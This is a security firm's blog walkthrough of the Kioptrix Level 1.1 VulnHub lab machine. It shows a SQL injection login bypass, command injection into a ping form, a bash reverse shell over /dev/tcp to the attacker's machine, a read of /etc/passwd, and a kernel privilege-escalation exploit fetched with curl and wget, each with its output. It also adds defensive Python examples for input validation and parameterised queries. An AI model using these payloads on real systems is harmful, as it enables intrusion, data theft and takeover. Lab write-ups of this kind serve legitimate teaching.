Cybersecurity: Kioptrix 1-1
Download our Whitepaper
We welcome you to download our whitepaper on cybersecurity. Our new cybersecurity department can help you if you need a cybersecurity consultation.
--------------------------------------------------------------------------------
SOLOMO : KIOPTRIX LEVEL 1-1
This walkthrough starts after installing the hackable machine Kioptrix Level 1-1 for practice. Kioptrix is a boot-to-root challenge which you can download from Vulnhub and install on your virtual machine. I am using VirtualBox.
The methods that I will use in this article are as follows:
The installation method for Kioptrix on VirtualBox is in this link: https://www.geeksforgeeks.org/how-to-install-kioptrix-level-1-on-virtualbox/
Methodology
Used Tools
So, let's start.
Turn on the Kioptrix 2.0 virtual machine and, from your attacking machine, scan the local network to get the victim's IP address. You can use the netdiscover command for that.
DISCOVERY
I use netdiscover to find the IP address of the Kioptrix Level 1.1 (#2) VM, then scan it with nmap:
nmap 192.168.18.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-07 15:48 EDT
Nmap scan report for 192.168.18.2
Host is up (0.14s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 08:00:27:38:97:10 (Oracle VirtualBox virtual NIC)
nmap -sC -sV 192.168.18.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 00:04 EDT
Nmap scan report for 192.168.18.2
Host is up (0.18s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            950/udp   status
|_  100024  1            953/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_ssl-date: 2022-05-08T00:32:27+00:00; -3h33m02s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:38:97:10 (Oracle VirtualBox virtual NIC)
Host script results:
|_clock-skew: -3h33m02s
Finding:
Port 80 is open and running Apache httpd 2.0.52 (CentOS).
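A scan like the one above is only useful once someone turns it into findings. The following is an added example (not part of the original article) that parses the nmap -sC -sV output shown above, embedded here as a constructed sample string, and flags the items a reviewer would raise from the scan alone: SSH protocol 1 enabled, the end-of-life Apache 2.0 branch, the TLS certificate that expired in 2010, and a MySQL service reachable over the network. The scan date used for the expiry check is taken from the nmap banner.

```python
import re
from datetime import datetime

# Constructed sample: the relevant lines of the nmap -sC -sV output shown above.
NMAP_OUTPUT = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 00:04 EDT
Nmap scan report for 192.168.18.2
Host is up (0.18s latency).
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_ssl-date: 2022-05-08T00:32:27+00:00; -3h33m02s from scanner time.
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)
"""

# Date of the scan, taken from the "Starting Nmap ... at" banner above.
SCAN_DATE = datetime(2022, 5, 8)

# One port line: "<port>/<proto> <state> <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Return a list of service dicts; NSE script lines ('|' prefixed)
    are attached to the port line that precedes them."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            services.append({
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(), "scripts": [],
            })
        elif line.startswith("|") and services:
            services[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return services


def triage(services, scan_date):
    """Flag findings visible from the scan itself, as (port, message) tuples."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        scripts = " ".join(s["scripts"])
        if "supports SSHv1" in scripts:
            findings.append((s["port"], "SSH protocol 1 enabled (legacy, weak crypto)"))
        if s["service"] in ("http", "ssl/http") and s["version"].startswith("Apache httpd 2.0."):
            findings.append((s["port"], "Apache httpd 2.0.x branch is end-of-life"))
        m = re.search(r"Not valid after:\s*(\S+)", scripts)
        if m and datetime.fromisoformat(m.group(1)) < scan_date:
            findings.append((s["port"], "TLS certificate expired"))
        if s["service"] == "mysql":
            findings.append((s["port"], "MySQL reachable from the network"))
    return findings


def sample_findings():
    """Findings for the constructed sample above."""
    return triage(parse_nmap(NMAP_OUTPUT), SCAN_DATE)


if __name__ == "__main__":
    for port, message in sample_findings():
        print(f"{port}/tcp: {message}")
```

The parser only understands the plain-text layout shown on this page; for real pipelines, nmap's -oX output is the stable format to parse.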
Enumerating HTTP
Upon accessing the web server through a browser, the login page below is displayed:
Port 80:
We visit the webpage hosted on port 80:
http://192.168.18.2:80
After trying a few common and/or default credentials to authenticate with no success, I decided to run a Nikto scan to gain more information about the target and any possible exploitation routes.
Meanwhile, let's run Gobuster in the background to find hidden directories.
Sadly, the Nikto scan did not identify anything useful. The next step is the Gobuster scan for hidden files and directories, with the following flags:
gobuster dir -u http://192.168.18.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Exploiting SQL Injection and Remote Command Execution
It turns out the authentication can be bypassed by using the following payload in the username field (and the same in the password field):
magic super admin and magic super password
userid: admin' or 1=1#    pw: admin' or 1=1#
admin' or 1=1#
This means the query used to perform the authentication will look like the following:
SELECT * FROM users WHERE username = 'admin' or 1=1#' AND password = '...'
Since 1=1 is always true, the query returns a row and the web application allows the login. The # comments out the rest of the query (including the password check), just in case.
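The bypass works because the login code concatenates user input into the SQL string. The block below is an added example, not code from the Kioptrix VM, that reproduces the vulnerable pattern against a constructed in-memory SQLite table and places the parameterised version beside it. Because sqlite3 has no # line comment (MySQL accepts both # and --), the same payload is written with -- here, which is also how the page's own query line writes it. The table, the admin account and its password are made up for the example.

```python
import sqlite3


def make_db():
    """Constructed sample table. Plaintext passwords are used only to keep the
    example short; a real application stores salted password hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return db


def build_vulnerable_query(username, password):
    """String concatenation: the pattern that makes the bypass above possible."""
    return ("SELECT COUNT(*) FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(db, username, password):
    """Runs the concatenated query; returns True when any row matches."""
    return db.execute(build_vulnerable_query(username, password)).fetchone()[0] > 0


def login_safe(db, username, password):
    """Parameterised query: the payload is bound as data and never parsed as SQL,
    so the quote and the comment marker cannot change the query's structure."""
    row = db.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0


# The page's payload uses MySQL's '#' comment; sqlite3 only knows '--'.
PAYLOAD = "admin' or 1=1--"

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD, "wrong"))
    print("vulnerable login with payload:", login_vulnerable(db, PAYLOAD, "wrong"))
    print("safe login with payload:      ", login_safe(db, PAYLOAD, "wrong"))
```

Running it prints the concatenated query so you can see where the quote closes and the comment starts; the vulnerable login returns True with a wrong password, the parameterised one returns False.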
ls
index.php
pingit.php
Logging in takes us to a page that allows pinging other machines by entering an IP address:
This means there is a possibility of RCE (Remote Code Execution) through command injection, which can be turned into a reverse shell. Let's check which interpreters (bash, perl) are installed on the victim machine:
;bash --version
GNU bash, version 3.00.15(1)-release (i686-redhat-linux-gnu)
Copyright (C) 2004 Free Software Foundation, Inc.
We get output, which means bash is installed on the machine, so we can get a bash reverse shell.
;perl -v
This is perl, v5.8.5 built for i386-linux-thread-multi
Copyright 1987-2004, Larry Wall
Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'. If you have access to the
Internet, point your browser at https://www.perl.com/, the Perl Home Page.
;whoami
apache
***** We have command execution on the server *****
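The ping form executes whatever follows the semicolon because the application pastes the submitted value into a shell command line. As an added example (not the VM's pingit.php, and not in the original article), the block below shows that pattern next to the fix a defender would apply: validate the value as an IP address with the ipaddress module and pass an argv list to subprocess so no shell ever parses it. The sample inputs are constructed; run_ping is provided but not executed at import time.

```python
import ipaddress
import subprocess

# Constructed sample inputs: the first is what the ping form expects,
# the second is the kind of injected value the walkthrough above submits.
VALID_INPUT = "192.168.18.2"
INJECTED_INPUT = "192.168.18.2 ;id"


def vulnerable_ping_command(user_input):
    """The pattern behind the bug: user input is pasted into a shell command
    line. Returned as a string for inspection only; it is not executed here."""
    return "ping -c 3 " + user_input


def safe_ping_argv(user_input):
    """Validate the value as an IP address, then build an argv list for ping.
    No shell is involved, so ';', '&&', '|' and friends are never interpreted."""
    try:
        addr = ipaddress.ip_address(user_input.strip())
    except ValueError:
        raise ValueError(f"rejected ping target: {user_input!r}") from None
    # str(addr) re-serialises the parsed address, so only a canonical IP reaches ping.
    return ["ping", "-c", "3", str(addr)]


def run_ping(user_input, timeout=15):
    """Execute the validated command without shell=True."""
    return subprocess.run(safe_ping_argv(user_input), capture_output=True,
                          text=True, timeout=timeout)


def classify(user_input):
    """'ok' or 'rejected': what the web tier should log for each attempt,
    since rejected values are exactly the injection attempts worth alerting on."""
    try:
        safe_ping_argv(user_input)
        return "ok"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    print("vulnerable command line:", vulnerable_ping_command(INJECTED_INPUT))
    for value in (VALID_INPUT, INJECTED_INPUT):
        print(f"{value!r}: {classify(value)}")
```

Strict validation (an IP address, nothing else) beats escaping: there is no list of bad characters to keep up to date, and a rejected value is a clean signal for detection logging.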
Privilege Escalation
Command Injection
Once logged in, we're greeted with a page that allows us to "Ping a machine on the network".
Let's test the output of this page if we use
LISTEN FOR ACTION FROM HACKER MACHINE
Create a shell session in KALI MACHINE
Open a shell session:
In our terminal we use netcat in listening mode so that we can receive the shell in our terminal.
Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
ENTER CODE IN VICTIM WEB APPLICATION
ping 192.168.18.13 ;bash -i >& /dev/tcp/192.168.18.13/1234 0>&1
My Kali machine IP: 192.168.18.13
RESULT IN KALI MACHINE
nc -lvp 1234
listening on [any] 1234 ...
192.168.18.15: inverse host lookup failed: Unknown host
connect to [192.168.18.13] from (UNKNOWN) [192.168.18.15] 32779
bash: no job control in this shell
bash-3.00$
bash-3.00$ whoami
apache
bash-3.00$
##### I AM INSIDE THE MACHINE
192.168.18.2 && ls -la
PING 192.168.18.2 (192.168.18.2) 56(84) bytes of data.
64 bytes from 192.168.18.2: icmp_seq=0 ttl=64 time=9.68 ms
64 bytes from 192.168.18.2: icmp_seq=1 ttl=64 time=42.0 ms
64 bytes from 192.168.18.2: icmp_seq=2 ttl=64 time=7.11 ms
--- 192.168.18.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2046ms
rtt min/avg/max/mdev = 7.119/19.607/42.021/15.883 ms, pipe 2
total 24
drwxr-xr-x 2 root root 4096 Oct 8 2009 .
drwxr-xr-x 8 root root 4096 Oct 7 2009 ..
-rwxr-Sr-t 1 root root 1732 Oct 8 2009 index.php
-rwxr-Sr-t 1 root root 199 Oct 8 2009 pingit.php
;id
uid=48(apache) gid=48(apache) groups=48(apache)
;ls /home   # list the user home directories on the target
harold
john
;cat /etc/passwd   # list the local accounts and their shells (the hashes live in /etc/shadow, not here)
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
;uname -a   # kernel version of the target, which we use to search for a local exploit
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
IN KALI MACHINE
┌──(root㉿kali)-[~]
└─# cat /proc/version
Linux version 5.15.0-kali3-amd64 ([email protected]) (gcc-11 (Debian 11.2.0-14) 11.2.0, GNU ld (GNU Binutils for Debian) 2.37.90.20220123) #1 SMP Debian 5.15.15-2kali1 (2022-01-31)
searchsploit
According to searchsploit we have a potential local exploit we can use once we have a shell on the system: exploit 9545.
root@kali# searchsploit -m linux/local/9545
  Exploit: Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/9545
     Path: /usr/share/exploitdb/exploits/linux/local/9545.c
File Type: C source, ASCII text
Copied to: /root/9545.c
Before transferring the exploit to the target machine with a Python web server, confirm the entry with searchsploit:
$ searchsploit Linux Kernel CentOS
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
...
Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privi | linux_x86/local/42274.c
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Pr | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Esc | linux/local/9479.c
...
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Search Google for the kernel exploit. We found the exploit here:
https://www.exploit-db.com/exploits/9542
Copy the exploit path and copy the file to our local folder. We'll need to upload it to the target later.
$ searchsploit -p 9545
Exploit: Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/9545
Path: /usr/share/exploitdb/exploits/linux/local/9545.c
File Type: C source, ASCII text, with CRLF line terminators
Create a Python SimpleHTTPServer to serve the file (the Python 3 command is a bit different):
$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
PYTHON 3 COMMAND
python3 -m http.server 9000
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
On the target machine, using our open shell session, run curl to pull the exploit file:
curl http://192.168.18.13:9000/9545.c --output /tmp/9545.c
bash-3.00$ curl http://192.168.18.13:9000/9545.c --output /tmp/9545.c
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9408  100  9408    0     0  29128      0 --:--:-- --:--:-- --:--:-- 54068
?
Note:
We're storing the file in the /tmp path because we might encounter permission issues storing and accessing files in other directories.
Use ls -la /tmp to verify the file exists:
bash-3.00$ ls -la /tmp
total 32
drwxr-xrwx 4 root root 4096 Jan 18 19:18 .
drwxr-xr-x 23 root root 4096 Jan 18 17:02 ..
-rw-r--r-- 1 apache apache 9783 Jan 18 19:17 9545.c
drwxrwxrwt 2 root root 4096 Jan 18 17:03 .font-unix
drwxrwxrwt 2 root root 4096 Jan 18 17:02 .ICE-unix
Change directory to /tmp, compile and run the exploit, then check whoami to confirm that it worked:
bash-3.00$ gcc -o my_exploit 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ./my_exploit
sh: no job control in this shell
sh-3.00# whoami
root
Success! This has granted a root-level shell with full access to the machine.
METHOD 2
INSTALL GEDIT
apt install gedit
gedit 9545.c
Copy and paste the exploit code into the file.
This is an old exploit, hence it throws errors when we compile it with the gcc compiler. The flag -m64 was working in my case, so we choose clang, which comes pre-installed in Kali Linux:
clang -o exploit -m64 9545.c
Now let's place this exploit in our Apache server directory:
mv exploit /var/www/html
Let's start our Apache server:
service apache2 start
Now let's go back to our reverse shell and change to the /tmp directory, as this is the directory that has all the permissions (read, write, execute), then fetch the binary from the Kali machine:
wget 192.168.18.13/exploit
ls
chmod 755 exploit; ./exploit
Now run the exploit.
Who are we?
We are white-hat cybersecurity professionals who help companies secure themselves against attacks. To be a white-hatter, we need to be a hacker: to know how hackers attack, and then to deploy the defence against them.
Cybersecurity Approved Vendor for the PSG grant for the Cybersecurity Trustmark. Our colleagues work in the information security field in Singapore and are interested in network protocols and how to assess customer networks (or how to protect your networks from the bad guys).
Open to helping the IS community.
Contact Us Whatsapp: 83827213